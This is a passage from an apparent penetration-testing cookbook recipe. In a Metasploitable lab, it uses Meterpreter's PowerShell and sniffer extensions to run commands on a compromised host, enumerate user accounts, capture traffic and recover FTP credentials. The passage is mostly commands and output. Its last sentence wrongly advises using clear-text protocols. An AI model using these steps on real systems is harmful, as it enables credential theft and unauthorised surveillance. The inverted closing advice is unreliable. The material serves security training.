- In this recipe, we will start by loading the PowerShell extension with the load powershell command and have a look at which commands were added to our Meterpreter session using the help command:
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > help powershell
Powershell Commands
===================
Command Description
------- -----------
powershell_execute Execute a Powershell command string
powershell_import Import a PS1 script or .NET Assembly DLL
powershell_shell Create an interactive Powershell prompt
meterpreter >
- The first command we will check is the powershell_execute command, which allows us to execute PowerShell commands:
meterpreter > powershell_execute $PSVersionTable
[+] Command execution completed:
Name Value
---- -----
CLRVersion 2.0.50727.5420
BuildVersion 6.1.7601.17514
PSVersion 2.0
WSManStackVersion. 2.0
PSCompatibleVersions {1.0, 2.0}
SerializationVersion 1.1.0.1
PSRemotingProtocolVersion 2.1
As you can see, using the powershell_execute command, we can execute PowerShell commands as if we were at the PowerShell prompt.
- We can even use multiple PowerShell commands by placing them within quotes, as in the following example, where we use PowerShell to get a list of all the users in the domain:
meterpreter > powershell_execute "Get-WmiObject Win32_UserDesktop | Select-Object Element"
[+] Command execution completed:
Element
-------
\\VAGRANT-2008R2\root\cimv2:Win32_UserAccount.Domain="VAGRANT-2008R2",Name="Administrator"
\\VAGRANT-2008R2\root\cimv2:Win32_UserAccount.Domain="VAGRANT-2008R2",Name="anakin_skywalker"
\\VAGRANT-2008R2\root\cimv2:Win32_UserAccount.Domain="VAGRANT-2008R2",Name="artoo_detoo"
...
\\VAGRANT-2008R2\root\cimv2:Win32_UserAccount.Domain="VAGRANT-2008R2",Name="vagrant"
- By loading the sniffer extension, we can start a network sniffer on the target machine:
meterpreter > load sniffer
Loading extension sniffer...Success.
meterpreter > help sniffer
Sniffer Commands
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_release Free captured packets on a specific interface instead of downloading them
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface
- Before we begin capturing packets, we will first enumerate the available interfaces using the sniffer_interfaces command:
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Desktop Adapter' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
4 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
- Then, we will start sniffing on the third interface using the sniffer_start, followed by the interface ID:
meterpreter > sniffer_start 3
[*] Capture started on interface 3 (50000 packet buffer)
- To generate some traffic, we will log in to the Metasploitable 3 machine, open a command prompt and FTP to the Metasploitable 2 machine, using the username user and the password user:
Then, we will stop the sniffer using the sniffer_stop 3 command:
meterpreter > sniffer_stop 3
[*] Capture stopped on interface 3
[*] There are 53 packets (4561 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
Download the PCAP using the sniffer_dump 3 command:
meterpreter > sniffer_dump 3 dump.pcap
[*] Flushing packet capture buffer for interface 3...
[*] Flushed 53 packets (5621 bytes)
[*] Downloaded 100% (5621/5621)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to dump.pcap
Now that we have the PCAP file, we can use tcpdump, a packet analyzer command-line tool, to display the PCAP contents, with -nn so it doesn't convert addresses or ports, A to print each packet in ASCII, and r to read from the PCAP file:
root@kali:~# tcpdump -nnAr dump.pcap port 21
reading from file dump.pcap, link-type EN10MB (Ethernet)
11:07:41.000000 IP 192.168.216.10.50255 > 192.168.216.129.21: Flags [S], seq 4124208382, win 8192, options [mss 1460,nop,wscale 0,nop,nop,sackOK], length 0
E..4..@........
.....O....l....... .2...............
...snip...
11:07:43.000000 IP 192.168.216.10.50255 > 192.168.216.129.21: Flags [P.], seq 1:12, ack 21, win 8172, length 11: FTP: USER user
E..3..@........
.....O....l.g...P...2...USER user
...snip...
11:07:44.000000 IP 192.168.216.10.50255 > 192.168.216.129.21: Flags [P.], seq 12:23, ack 55, win 8138, length 11: FTP: PASS user
E..3..@........
.....O....m
g...P...2...PASS user
Looking at the output, we can see that we were able to capture the FTP credentials from the connection between the Metasploitable 3 and Metasploitable 2 machines.
This is the reason why you should use clear text protocols, such as FTP and Telnet.